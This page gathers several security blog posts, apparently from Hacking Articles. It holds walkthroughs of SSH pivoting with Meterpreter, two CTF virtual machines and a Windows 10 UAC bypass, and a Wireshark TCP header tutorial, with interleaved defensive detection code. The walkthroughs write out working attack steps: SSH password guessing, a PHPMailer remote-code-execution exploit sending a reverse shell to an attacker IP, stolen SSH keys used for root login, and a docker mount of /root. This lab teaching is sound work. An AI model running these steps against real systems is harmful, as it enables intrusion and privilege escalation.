News from 'Hacking Articles'

Raj Chandel's Blog

SSH Pivoting using Meterpreter

Mon, 14/Aug/2017 - 22:00

If you are aware of SSH tunneling then you can easily understand SSH pivoting; if not, don't worry, read about SSH tunneling here first.

Pivoting is a technique for reaching an otherwise unreachable network through a compromised host that acts as the pivot (centre point). In simple words, it is an attack in which the attacker targets systems that belong to a different network. To do this, the attacker first exploits the main server, which places the attacker inside that server's local network, and from there the attacker can target the client systems.

This module will test SSH logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database, this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.109

msf auxiliary(ssh_login) > set username raj

msf auxiliary(ssh_login) > set password 123

msf auxiliary(ssh_login) > exploit
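The login scanner above leaves a recognisable trail in the target's sshd log: a burst of "Failed password" lines from one source followed by an "Accepted password" for the same user. The following is an added defender-side example (not code from the original post or from Metasploit) that parses constructed sshd log lines in the standard syslog format and flags that pattern; the host name, PIDs and addresses in the sample are made up, and the threshold and time window are assumptions you would tune.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines (not captured from the lab above): three failed guesses
# against user raj followed by a success from the same source, plus an unrelated key login.
SAMPLE_AUTH_LOG = """\
Aug 14 21:58:01 sshserver sshd[2201]: Failed password for raj from 192.168.0.20 port 40112 ssh2
Aug 14 21:58:02 sshserver sshd[2203]: Failed password for raj from 192.168.0.20 port 40114 ssh2
Aug 14 21:58:02 sshserver sshd[2205]: Failed password for invalid user admin from 192.168.0.20 port 40116 ssh2
Aug 14 21:58:03 sshserver sshd[2207]: Accepted password for raj from 192.168.0.20 port 40118 ssh2
Aug 14 21:59:40 sshserver sshd[2310]: Accepted publickey for ops from 192.168.0.5 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2}\s\d\d:\d\d:\d\d)\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Accepted|Failed)\s(?P<method>\w+)\sfor\s(?:invalid user\s)?"
    r"(?P<user>\S+)\sfrom\s(?P<src>[0-9a-fA-F.:]+)\sport\s\d+"
)

def parse_auth_log(text):
    """Return one dict per recognised sshd authentication line; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            # syslog timestamps carry no year; strptime defaults it to 1900, fine for ordering
            ev["time"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
            events.append(ev)
    return events

def failures_by_source(events):
    """Count failed logins per source address."""
    counts = defaultdict(int)
    for ev in events:
        if ev["result"] == "Failed":
            counts[ev["src"]] += 1
    return dict(counts)

def find_password_guessing(events, fail_threshold=3, window_seconds=60):
    """Flag sources where an accepted password login follows at least `fail_threshold`
    failures from the same source within `window_seconds` (threshold values are assumptions)."""
    alerts = {}
    fails = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["result"] == "Failed":
            fails[ev["src"]].append(ev["time"])
        elif ev["method"] == "password":
            recent = [t for t in fails[ev["src"]]
                      if (ev["time"] - t).total_seconds() <= window_seconds]
            if len(recent) >= fail_threshold:
                alerts[ev["src"]] = {"user": ev["user"], "failures_before_success": len(recent)}
    return alerts

if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    print(failures_by_source(evs))
    print(find_password_guessing(evs))
```

Key-based logins are deliberately ignored by the alert logic: a spray of guesses that ends in an accepted publickey is a different (and usually benign) pattern, and mixing the two inflates false positives.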

From the given image you can observe that command shell session 1 opened.

Now convert the command shell into a Meterpreter shell with the following command:

sessions -u 1

From the given image you can observe that Meterpreter session 2 opened.

sessions

Hence, if you count, the attacker currently holds 2 sessions: the 1st a command shell and the 2nd a Meterpreter shell on the SSH server.

Check the network interfaces with the ifconfig command.

From the given image you can observe two network interfaces on the victim's system: the 1st with IP 192.168.0.109, through which the attacker is connected, and the 2nd with IP 192.168.10.1, through which the SSH client (target) is connected.

Since the attacker reaches the host through its 192.168.0.109 interface while the client sits on the 192.168.10.0 network, it is not possible to attack the client network directly unless the attacker obtains a route into it. To reach the 192.168.10.0 network the attacker needs to run the post-exploitation module "autoroute".

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list and then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table is routed through the session when pivoting.

msf > use post/multi/manage/autoroute

msf post(autoroute) > set subnet 192.168.10.0

msf post(autoroute) > set session 2

msf post(autoroute) > exploit
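To make the SUBNET, AUTOADD and DEFAULT semantics described above concrete, here is an added, simplified model of a pivot routing table (my own illustration, not Metasploit's code): routes map a destination network to a session id, lookups use longest-prefix match, and a default route catches everything else. The /24 netmasks are assumptions; the page shows only the addresses.

```python
import ipaddress

class PivotRouteTable:
    """Simplified model of the per-session routing table that autoroute manipulates:
    destination network -> session id, plus an optional default route."""

    def __init__(self):
        self.routes = []      # list of (IPv4Network, session_id)
        self.default = None   # session id for traffic matching no route; None = deliver directly

    def add(self, subnet, session_id, netmask="255.255.255.0"):
        """Equivalent of setting SUBNET/NETMASK and SESSION; strict=False tolerates host bits."""
        net = ipaddress.IPv4Network((subnet, netmask), strict=False)
        self.routes.append((net, session_id))
        return net

    def add_default(self, session_id):
        """Equivalent of the DEFAULT option: everything not in the table goes through the session."""
        self.default = session_id

    def autoadd(self, session_id, interfaces):
        """Equivalent of AUTOADD: one route per directly attached subnet of the session's host."""
        return [self.add(ip, session_id, mask) for ip, mask in interfaces]

    def lookup(self, dst_ip):
        """Longest-prefix match; returns the session to pivot through, or the default."""
        ip = ipaddress.IPv4Address(dst_ip)
        best = None
        for net, sid in self.routes:
            if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, sid)
        return best[1] if best else self.default

def example_table():
    """Table matching the lab above: 192.168.10.0/24 reachable only via Meterpreter session 2."""
    table = PivotRouteTable()
    table.add("192.168.10.0", 2)
    return table

if __name__ == "__main__":
    t = example_table()
    print("192.168.10.2 ->", t.lookup("192.168.10.2"))    # session 2
    print("192.168.0.109 ->", t.lookup("192.168.0.109"))  # None: the attacker reaches it directly
```

With only the manual route, the first lookup pivots through session 2 and the second is delivered directly; calling `add_default(2)` afterwards would send the second one through the pivot as well, which is exactly the behaviour the DEFAULT option buys you.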

This time we are exploiting the SSH host ignite (the local client), so we use the same module that was used above for the SSH server raj; only the information inside the module needs to change.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.10.2

msf auxiliary(ssh_login) > set username ignite

msf auxiliary(ssh_login) > set password 1234

msf auxiliary(ssh_login) > exploit

From the given image you can see another command shell, session 3, opened; if you count, the attacker now holds 3 sessions: two for the SSH server and one for the SSH client.

sessions

  1. Command shell for SSH raj (192.168.0.109:22)
  2. Meterpreter shell for SSH raj (192.168.0.109)
  3. Command shell for SSH ignite (192.168.10.2:22)

sessions -i 3

Now the attacker is in the command shell of the SSH client ignite; let's verify this through the network configuration.

ifconfig

From the given image you can observe that the network IP is 192.168.10.2.

Pivoting is a dangerous but enjoyable network attack.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

The post SSH Pivoting using Meterpreter appeared first on Hacking Articles.

Categories: Cyber India

Hack the Moria: 1.1 (CTF Challenge)

Sun, 13/Aug/2017 - 14:53

Today I found a vulnerable lab based on the world of The Lord of the Rings. So get into your Gandalf mode to solve this fun vulnerable lab, Moria 1.2; we are going to download the VM from here.

The credit for developing this VM goes to Abatchy. It is a Boot2Root lab.

Note: According to the author you don't need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, let us start by finding the IP of the VM (here I have it at 192.168.1.125, but you will have to find your own).

netdiscover

Use the nmap command for port enumeration:

nmap -sV 192.168.1.125

As you can see, port 21 for FTP, port 22 for SSH and port 80 for HTTP are open, so let's explore port 80 through the browser.

After browsing I found this image labelled Gates of Moria. I decided to do a bit of research on the text written below the image. After searching through some wiki pages, I found its translation, "Say Friend and Enter", where Mellon means Friend.

So Friend or Mellon must be a password. Keeping that in mind, let's move forward. Here I decided to scan the target directories with dirb. Open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.125/

From the scan result I chose the highlighted directory for further enumeration.

http://192.168.1.125/w/

So I opened this directory in the browser and found another directory inside it, i.e. h/.

Opening it gave another directory, and so on, until the path /w/h/i/s/p/e/r is complete. Here we find the last directory, named the_abyss/.

On opening the_abyss I got some text, as shown in the image: Fundin: "That human will never save us!"

I tried looking at the source code but found nothing; then I refreshed the page and the text above changed into another line, and on refreshing again it changed into "Knock Knock".

It seemed weird at first, but I refreshed again and it changed again, so the text was changing randomly each time I refreshed the web page.

So I ran a dirb scan, but it gave no result, so I ran a dirb scan with file extensions, as shown:

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt,.img,.html

The -X option makes dirb look for files with the specified extensions, such as .txt or .img.

Aha! Found a file named random.txt.

So I opened it in the browser and found all the text that was appearing on refresh collected on a single web page, as shown.

This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru and Balrog; I noted them because they might be usernames or passwords.

Now I tried to connect to the FTP port.

ftp 192.168.1.125

 

It greeted me with Welcome Balrog.

And I knew it must be the username because it was in random.txt too, but for the password I tried multiple names that I had found earlier, and then I remembered the text from the image, "Say friend and enter". I entered Friend but the login failed; then I tried Mellow and logged in successfully.

Therefore, for the FTP login use the following credentials:

Username: Balrog

Password: Mellow

NOTE: If you get an error, restart the VM and also try multiple times with the above username and password.

After login I tried the pwd command and got the path /prision. I looked around it hoping for a flag but didn't find any hint. Then I found the var folder and moved inside it.

Then I got to /var/www/html, where I found this folder: QlVraKW4fbIkXau9zkAPNGzviT3UKntl

When I opened it in the browser I found a table with two columns, Prisoner's name and Passkey, as shown in the given image.

As always, I searched the source code for a hint. In the View Source page I found the "salt", which can be used to crack the MD5 password hashes.

After trying different formats to crack the above MD5 hashes, I created a file with the name, passkey and salt in this format:

Prisoner’s Name:Passkey$Salt

Name it whatever you want (here I named it passwords and saved it on my Kali desktop).

Now we will run John the Ripper with the dynamic_6 format on this file to crack it, using this command in my Kali terminal:

john --format=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying all the cracked user credentials to log in via SSH, I got success with:

SSH Login

Username :Ori

Password :spanky

Now log in to SSH using the above credentials:

ssh Ori@192.168.1.125

Here we got a bash shell. Now I tried multiple commands in search of a flag; in ls -al I found a poem.txt file, which contains a poem, but I didn't find any flag inside it.

Then I looked into the .ssh/ directory and found a known_hosts file and an id_rsa file, which contained the private key; then I opened these files one by one:

cat id_rsa

Copy the entire text found inside id_rsa into a text file and save it as id_rsa.

Now open the other file, known_hosts, with the cat command; here you will find that the host is "127.0.0.1". Let's use this information for an SSH login as the root user:

ssh -i id_rsa root@127.0.0.1

I got root.

But let's finish it properly. So I ran ls -la to look for a flag, and I found flag.txt; inside flag.txt I got the final message "All that is gold does not glitter".

It was an adventurous learning experience, and I would like to thank Abatchy for creating such a fun VM lab.

Author: Pavandeep Singh is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India. Contact here

Categories: Cyber India

Bypass UAC in Windows 10 using bypass_comhijack Exploit

Sat, 12/Aug/2017 - 21:50

In this article we are going to bypass User Account Control (UAC) on the targeted system. This is post-exploitation; hence the attacker must first exploit the target system and then escalate using the UAC Protection Bypass via COM Handler Hijack module.

Let's start!!

Attacker: Kali Linux

Target: Windows 10

First exploit the target to receive a Meterpreter session on the victim's system. Once you get Meterpreter session 1, type the following commands to check the system authority and privileges:

getuid

getprivs

From the given image you can perceive that the attacker is inside the Meterpreter shell of the victim's system but does not have system/admin authority and privileges. Hence we need to bypass the UAC protection of the targeted system.

To perform this attack you need to manually add the bypass_comhijack exploit to the Metasploit framework.

Copy the entire content of "bypass_comhijack" from here and paste it into a text document, then save it as bypass_comhijack.rb inside the following path:

/usr/share/metasploit-framework/modules/exploits/windows/local

From the given image you can observe that the bypass_comhijack.rb exploit has been saved; as the attacker has a Meterpreter session, he can now use this exploit to bypass UAC protection.

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced, resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

msf > use exploit/windows/local/bypassuac_comhijack

msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(bypassuac_comhijack) > set session 2

msf exploit(bypassuac_comhijack) > set lhost 192.168.0.20

msf exploit(bypassuac_comhijack) > exploit

From the given image you can observe that Meterpreter session 3 opened; now type the following commands to determine the system authority and privileges:

getsystem

getprivs

Wonderful!! The attacker got system/admin authority and privileges.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here
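The module description above says the bypass works by writing COM handler entries into the user-writable HKCU hive and cleaning them up afterwards, so a defender's check is to look for per-user COM registrations (HKCU\Software\Classes\CLSID\{GUID}\InprocServer32, the standard location for per-user in-process COM servers) whose DLL lives outside trusted system directories. The following is an added example of my own, not code from the post or from Metasploit; it parses a constructed .reg-style export, and the CLSIDs and file paths in the sample are made up.

```python
import re

# Constructed .reg-style export (not from the page's lab); CLSIDs and paths are made up.
SAMPLE_REG_EXPORT = r"""
[HKEY_CURRENT_USER\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32]
@="C:\\Users\\victim\\AppData\\Local\\Temp\\handler.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{8E0A1CF3-4D2B-4F6E-9C11-2A5F7B3D9E01}\InprocServer32]
@="C:\\Windows\\System32\\example.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{8E0A1CF3-4D2B-4F6E-9C11-2A5F7B3D9E01}]
@="Example Component"
"""

# Per-user in-process COM server registration key; {GUID} is 36 characters in 8-4-4-4-12 form.
INPROC_KEY_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32$",
    re.IGNORECASE)
# Directories a normal user cannot write to; a DLL elsewhere deserves a closer look.
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\program files")

def parse_reg_export(text):
    """Return (key, default_value) for every key in the export whose default value (@) is set."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current and line.startswith('@="') and line.endswith('"'):
            # .reg files escape quotes and backslashes; undo that to get the real path
            value = line[3:-1].replace('\\"', '"').replace("\\\\", "\\")
            entries.append((current, value))
    return entries

def find_user_com_handlers(text):
    """List HKCU InprocServer32 registrations. Those pointing outside trusted system
    directories are rated high; the rest are still worth a review, since the HKCU hive
    is writable by the user and should rarely register in-process COM servers at all."""
    findings = []
    for key, dll in parse_reg_export(text):
        if not INPROC_KEY_RE.match(key):
            continue
        trusted = dll.lower().startswith(tuple(d + "\\" for d in TRUSTED_DIRS))
        findings.append({"key": key, "dll": dll, "severity": "review" if trusted else "high"})
    return findings

if __name__ == "__main__":
    for f in find_user_com_handlers(SAMPLE_REG_EXPORT):
        print(f["severity"], f["dll"], "<-", f["key"])
```

Because the module removes its keys after use, a one-off registry sweep can miss it; the same matching logic is more useful applied to registry-write events (Sysmon event ID 13 or an EDR's registry telemetry) as they happen, which is an assumption about your tooling rather than something the post describes.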

Categories: Cyber India

Hack the DonkeyDocker (CTF Challenge)

Fri, 11/Aug/2017 - 16:34

Today we are going to solve a fun vulnerable lab, DonkeyDocker; download the VM from here.

The credit for developing this VM goes to Dennis Herrmann, who has hidden 3 flags inside this lab as a challenge for hackers.

Let's Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.120, but you will have to find your own).

netdiscover

Use the nmap command for port enumeration:

nmap -sV 192.168.1.120

As you can see, port 22 for SSH and port 80 for HTTP are open, so let's explore port 80 through the browser.

After browsing I found three tabs, Home, About and Contact, but didn't find any clue for the next step, so I decided to scan the target directories with dirb.

Now open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.120

From the scan result I chose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here we get to know that PHPMailer is running on the targeted system. Let's try to find out its version.

After browsing a bit about PHPMailer, we came to know how to get its version:

http://192.168.1.120/mailer/VERSION

We got the version of PHPMailer, i.e. 5.2.16.

From Google we came to know that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (CVE-2016-10033); the Python exploit gets a back connection (reverse shell) from the target. You can download this exploit from here.

After downloading the Python file, make the following changes:

  1. Open the file and add "# coding: utf-8" at the beginning.
  2. Set target = 'http://192.168.1.120/contact' (victim IP); it is the location where backdoor.php gets uploaded to the victim's machine automatically.
  3. Give the attacker IP, 192.168.1.101 (Kali Linux IP), inside the payload code.
  4. After making the above changes, save it.

Now start netcat on the same port to which the payload connects back, i.e. 4444, to receive the reverse connection from the target:

nc -lvp 4444

Before you run the Python script, type the following command in a new terminal to install the exploit's dependency:

pip2 install requests_toolbelt

Now run the script to exploit the target, as shown in the given image:

python 40974.py

Move back to the netcat shell; here you will find that it is connected to the victim but does not give a proper shell, so type the given command to get a proper shell, as shown in the image:

python -c 'import pty; pty.spawn("/bin/bash")'

Once you have the victim's shell, type the following commands to find the hidden flag:

ls

cat main.sh

Here we found that user smith has a directory containing flag.txt; let's approach this directory.

cd home

ls

When opening the smith directory we got Permission denied.

Then we used su smith instead of sudo, because sudo is not available in this shell:

su smith

For the password we tried "smith" and successfully got smith's shell.

Now we are inside smith's shell; type the following commands to get the flag:

ls

cd /home/smith

ls

flag.txt

cat flag.txt

Great!! Successfully captured the 1st flag.

Moreover, if you look at the given image you will find the next clue, "I like 1984 written by George ORWELL"; it might be a username with the 2nd flag inside its home directory.

Type the following command to list all directories:

ls -al

We got authorized_keys, id_ed25519 and id_ed25519.pub in the .ssh directory; let's open these keys one by one:

cat authorized_keys

cat id_ed25519

cat id_ed25519.pub

In id_ed25519 we get the OpenSSH private key, and this key is authorized for orwell@donkeydocker. Now copy the private key and paste it into a text file.

We have saved this private key in a file named id_rsa, as shown in the image below.

Now log in with SSH using it:

ssh -i id_rsa orwell@192.168.1.120

Here you will be greeted by the Donkey Docker shell. Now check the directory listing for the 2nd flag:

ls

flag.txt

cat flag.txt

Nice!! Successfully got the 2nd flag.

For the last flag we tried a lot of different tricks but nothing seemed to get through; you can read an article here which helped in finding the 3rd flag.

Type following command

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'ls -al /hack'

This created a user named Jessie and gave it root access through privilege escalation; check all the directory listings inside it, and here we get the flag.txt file.

Now to open this file we will use the previous command with a slight modification, as shown:

docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'

Awesome, we got the 3rd flag as well.

Author: Pavandeep Singh is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India. Contact here

Categories: Cyber India
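The third flag falls because anyone allowed to run docker can bind-mount any host path into a container and read it as the container's root user (jessie here is the Debian release tag of the image, not a user account). The following is an added example of my own, not part of the writeup, of the kind of policy check a wrapper script or CI job can apply to a docker run command line before it executes: it parses the -v/--volume options and flags bind mounts of sensitive host paths. The list of sensitive paths is an assumption you would adapt to your hosts.

```python
import os
import shlex

# Host paths (and anything beneath them) whose bind-mount hands the container root the host.
# This list is an assumption for the example, not a complete policy.
SENSITIVE_HOST_PATHS = ("/", "/root", "/etc", "/home", "/var/run/docker.sock",
                        "/proc", "/sys", "/boot")

def bind_mounts(docker_cmd):
    """Extract (host_path, container_path, options) from every -v/--volume bind mount
    on a docker run command line; named volumes (no leading /) are skipped."""
    argv = shlex.split(docker_cmd)
    mounts, i = [], 0
    while i < len(argv):
        arg = argv[i]
        if arg in ("-v", "--volume") and i + 1 < len(argv):
            spec, i = argv[i + 1], i + 2
        elif arg.startswith("--volume="):
            spec, i = arg.split("=", 1)[1], i + 1
        else:
            i += 1
            continue
        parts = spec.split(":")
        if len(parts) >= 2 and parts[0].startswith("/"):
            mounts.append((parts[0], parts[1], parts[2] if len(parts) > 2 else "rw"))
    return mounts

def risky_mounts(docker_cmd):
    """Return the normalised host paths in the command that expose a sensitive location."""
    risky = []
    for host, _container, _opts in bind_mounts(docker_cmd):
        norm = os.path.normpath(host)
        if norm == "/" or any(norm == p or norm.startswith(p + "/")
                              for p in SENSITIVE_HOST_PATHS if p != "/"):
            risky.append(norm)
    return risky

if __name__ == "__main__":
    # The exact command used in the writeup above, as it would be checked by a wrapper.
    cmd = "docker run -v /root:/hack -t debian:jessie /bin/sh -c 'cat /hack/flag.txt'"
    print(bind_mounts(cmd))   # [('/root', '/hack', 'rw')]
    print(risky_mounts(cmd))  # ['/root']
```

The check is a guard rail, not a boundary: the real fix is that membership of the docker group (or access to the daemon socket) has to be treated as root-equivalent, so on a multi-user host it is granted like sudo, or the daemon is run in rootless mode.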

Analysing TCP Headers using Wireshark

Fri, 11/Aug/2017 - 15:04

From Wikipedia:

TCP is used by many applications available on the Internet, including the World Wide Web (WWW), e-mail, File Transfer Protocol, Secure Shell, peer-to-peer file sharing, and streaming media applications.

3-Way Handshake

The handshaking process takes place in order to establish the rules for communication when a computer sets about communicating with a foreign device. When a computer communicates with another device such as a modem, printer, or network server, it needs to handshake with it to establish a connection.

  • The client sends a TCP packet to the server with the SYN flag set.
  • The server responds to the client's request with the SYN and ACK flags set.
  • The client completes the connection by sending a packet with the ACK flag set.

Structure of a TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header, creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains 10 mandatory fields and an optional extension field.

Source Port: The 16-bit source port number; identifies the sending port.

Destination Port: The 16-bit destination port number; identifies the receiving port.

Sequence Number: The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.

Acknowledgment Number: If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.

Data Offset: The number of 32-bit words in the TCP header. It indicates where the data begins.

Reserved: Six bits reserved for future use; must be zero.

Flags: CWR, ECE, URG, ACK, PSH, RST, SYN, FIN.

Window: Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field, that the receiver (the sender of this segment) is willing to accept.

Checksum: The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.

Urgent Pointer: Points to the first data octet following the urgent data. Only significant when the URG control bit is set.

Options: Just as in the case of IP datagram options, options can be

either:

– A single byte containing the option number

– A variable-length option

Padding: The TCP header padding is used to ensure that the TCP header ends and the data begins on a 32-bit boundary. The padding is composed of zeros.

Different Types of TCP Flags

TCP flags are control bits within the TCP header that specify particular connection states or information about how a packet should be handled. The flag field of a TCP segment helps us understand the function and purpose of any packet in the connection.

List of flags

  • CWR: Congestion Window Reduced; set by the sending host to show that it received a TCP segment with the ECE flag set.
  • ECE: ECN-Echo; indicates that the TCP peer is ECN capable during the 3-way handshake.
  • URG: Indicates that the urgent pointer field is significant in this segment.
  • ACK: Indicates that the acknowledgment field is significant in this segment.
  • PSH: Push function to transfer data.
  • RST: Resets the connection.
  • SYN: Synchronizes the sequence numbers.
  • FIN: No more data from the sender.

Analysing TCP packets using Wireshark
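To tie the field layout, the flag bits and the handshake steps above together, here is an added example (my own code, not part of the original article) that decodes the mandatory header fields from raw bytes, verifies the checksum over the IPv4 pseudo-header exactly as the Checksum field description says, and labels each segment of a constructed three-way handshake plus one HTTP request. The ports and relative sequence numbers mirror the Wireshark capture discussed below; the IP addresses and the MSS option are made up.

```python
import struct
import ipaddress

# Flag bits of the byte at TCP header offset 13, highest bit first.
FLAG_BITS = {"CWR": 0x80, "ECE": 0x40, "URG": 0x20, "ACK": 0x10,
             "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01}
TCP_PROTO = 6

def parse_tcp_header(segment):
    """Decode the mandatory TCP header fields (plus options and payload) from a raw segment."""
    if len(segment) < 20:
        raise ValueError("TCP header needs at least 20 bytes")
    sport, dport, seq, ack, off_res, flag_byte, window, checksum, urg = struct.unpack(
        "!HHIIBBHHH", segment[:20])
    data_offset = (off_res >> 4) * 4           # header length in 32-bit words -> bytes
    if data_offset < 20 or data_offset > len(segment):
        raise ValueError("bad data offset %d" % data_offset)
    return {
        "src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
        "data_offset": data_offset, "reserved": off_res & 0x0F,   # reserved bits, must be zero
        "flags": [name for name, bit in FLAG_BITS.items() if flag_byte & bit],
        "window": window, "checksum": checksum, "urgent_pointer": urg,
        "options": segment[20:data_offset], "payload": segment[data_offset:],
    }

def ones_complement_sum(data):
    """Sum of 16-bit big-endian words with end-around carry (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"                        # an odd trailing byte is padded with zero
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def tcp_checksum(src_ip, dst_ip, segment):
    """Checksum over IPv4 pseudo-header + TCP header + data, with the checksum field zeroed."""
    pseudo = (ipaddress.IPv4Address(src_ip).packed + ipaddress.IPv4Address(dst_ip).packed
              + struct.pack("!BBH", 0, TCP_PROTO, len(segment)))
    zeroed = segment[:16] + b"\x00\x00" + segment[18:]
    return (~ones_complement_sum(pseudo + zeroed)) & 0xFFFF

def checksum_ok(src_ip, dst_ip, segment):
    return tcp_checksum(src_ip, dst_ip, segment) == parse_tcp_header(segment)["checksum"]

def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, window, options=b"", payload=b""):
    """Build a segment with a correct checksum; used here only to construct sample input."""
    while len(options) % 4:
        options += b"\x00"                     # pad options so data starts on a 32-bit boundary
    offset_words = (20 + len(options)) // 4
    flag_byte = sum(FLAG_BITS[f] for f in flags)
    header = struct.pack("!HHIIBBHHH", sport, dport, seq, ack,
                         offset_words << 4, flag_byte, window, 0, 0)
    seg = header + options + payload
    return seg[:16] + struct.pack("!H", tcp_checksum(src_ip, dst_ip, seg)) + seg[18:]

def handshake_step(parsed):
    """Name the handshake step a segment belongs to, judged from its flags and payload."""
    f = set(parsed["flags"])
    if f == {"SYN"}:
        return "1: client SYN"
    if f == {"SYN", "ACK"}:
        return "2: server SYN/ACK"
    if f == {"ACK"} and not parsed["payload"]:
        return "3: client ACK, connection established"
    if "ACK" in f and parsed["payload"]:
        return "data transfer" + (" (PSH)" if "PSH" in f else "")
    return "other"

# Constructed flow: three-way handshake plus one HTTP request. IPs are made up; ports and
# relative sequence numbers follow the capture discussed in the article.
CLIENT, SERVER = "10.0.0.2", "10.0.0.1"
MSS_OPTION = b"\x02\x04\x05\xb4"             # kind 2, length 4, MSS 1460 (assumed value)
SAMPLE_FLOW = [
    (CLIENT, SERVER, build_segment(CLIENT, SERVER, 58302, 80, 0, 0, ["SYN"], 29200, MSS_OPTION)),
    (SERVER, CLIENT, build_segment(SERVER, CLIENT, 80, 58302, 0, 1, ["SYN", "ACK"], 42408, MSS_OPTION)),
    (CLIENT, SERVER, build_segment(CLIENT, SERVER, 58302, 80, 1, 1, ["ACK"], 229)),
    (CLIENT, SERVER, build_segment(CLIENT, SERVER, 58302, 80, 1, 1, ["PSH", "ACK"], 229,
                                   payload=b"GET / HTTP/1.1\r\nHost: google.com\r\n\r\n")),
]

def analyse_flow(flow=SAMPLE_FLOW):
    """One summary per segment, in the style of the per-packet field dumps below."""
    out = []
    for src, dst, seg in flow:
        p = parse_tcp_header(seg)
        out.append({"src_port": p["src_port"], "dst_port": p["dst_port"], "seq": p["seq"],
                    "ack": p["ack"], "flags": p["flags"], "window": p["window"],
                    "checksum_ok": checksum_ok(src, dst, seg), "step": handshake_step(p)})
    return out

if __name__ == "__main__":
    for row in analyse_flow():
        print(row)
```

Note that Wireshark reports the Checksum as "unverified" in the captures below because checksum validation is off by default; the recomputation in `tcp_checksum` is what that validation would do, and the pseudo-header is why a TCP checksum cannot be verified from the TCP bytes alone.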

Having read the "structure of a TCP segment" and its fields above, we are now going to illustrate them with the help of Wireshark. We assume the reader is familiar with the 7 layers of the OSI model, so that the TCP packet analysis is clearer.

From the image below you can see that we sniffed the network in order to capture TCP packets; it clearly shows the time, source IP, destination IP, protocol, packet length and info columns.

As mentioned above, if you know the OSI model you can see that three layers are shown: layer 2 (Ethernet), layer 3 (Internet Protocol version 4) and layer 4 (Transmission Control Protocol, TCP).

Now let's analyse layer 4 and compare the theory above with the image below. You can see I have underlined all the fields of the TCP segment. Now read the following information from the TCP packet:

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 0

Flags: SYN

Window size value: 29200

Checksum: unverified

Urgent Pointer: 0

Options: 20 bytes

The SYN (synchronize) flag is the TCP flag set to start a TCP connection with the "3-way handshake", and here the sequence number and acknowledgment number are both 0.

From the image below you can see that the expanded flags field shows only 1 flag, SYN, set between the source port and destination port; the remaining flags are not set at this moment. Hence the control bit is 1 for a flag that is set in the TCP connection and otherwise remains zero.

Packets with the SYN flag set can also be used to perform a SYN flood and a SYN scan.

As explained above for the three-way handshake, the client first sends a request with the SYN flag, after which the server responds to the client's request with the SYN and ACK flags set; from the following information we observe the same sequence of packets between client and server, and the sequence number is 0 while the acknowledgment number is 1.

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 1

Flags: SYN, ACK

Window size value: 42408

Checksum: unverified

Urgent Pointer: 0

Options: 12 bytes

